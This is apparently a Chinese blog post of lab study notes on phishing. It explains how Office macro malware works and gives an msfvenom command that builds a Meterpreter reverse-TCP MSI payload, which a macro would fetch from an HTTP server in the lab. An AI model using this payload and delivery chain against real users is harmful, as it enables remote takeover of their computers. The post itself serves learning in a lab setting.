JZTXT

社工钓鱼

发布时间 2023-11-30 23:55:32作者: crayon's

前言

渗透实验学习了社工钓鱼样本的使用,跟着指导书简单的学习,这里写一下社工钓鱼的学习笔记,但是没有过实操的经验,所以是理论性的学习。
ps:未涉及免杀学习

概述

钓鱼常用在攻防演练对抗上,钓鱼的方式有很多,比如钓鱼网站、钓鱼邮件、钓鱼wifi、u盘钓鱼等等。

这里练习一些钓鱼方法

钓鱼文件

office宏文件钓鱼攻击

关于宏病毒

office宏病毒一般寄存于office文档,宏是,当用户打开文档,内置的宏命令就会执行,在计算机中执行恶意命令,恶意命令会自动访问提前部署好的恶意服务器下载木马程序到本地并运行,从而控制计算机。

本地测试

  • msf excel2003
    实验前需要在信任中心启用宏

要使用宏,需要学习一些office VBA语法,当然也可以直接使用msf或其他生成代码直接插入。

Alt text

msf生成msi文件

实验准备

  • 主机:

    • kali:192.168.163.128
    • windows:192.168.163.1

  • 网络环境:kali和物理机在同一局域网内,可以连通,配置kali为VMnet1仅主机模式
    具体操作可看这个https://blog.csdn.net/richardfjf/article/details/106728258

  1. 生成恶意msi文件
    msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=kali的ip lport=监听的端口 -f msi -o hack.msi

  2. msf建立监听
    Alt text

  3. pyhton开启http服务
    Alt text

    这个网络还是没配置好,主机访问不到http服务器
    Alt text

  4. 然后执行文件,自动运行宏,从服务器中下载恶意msi文件,成功上线。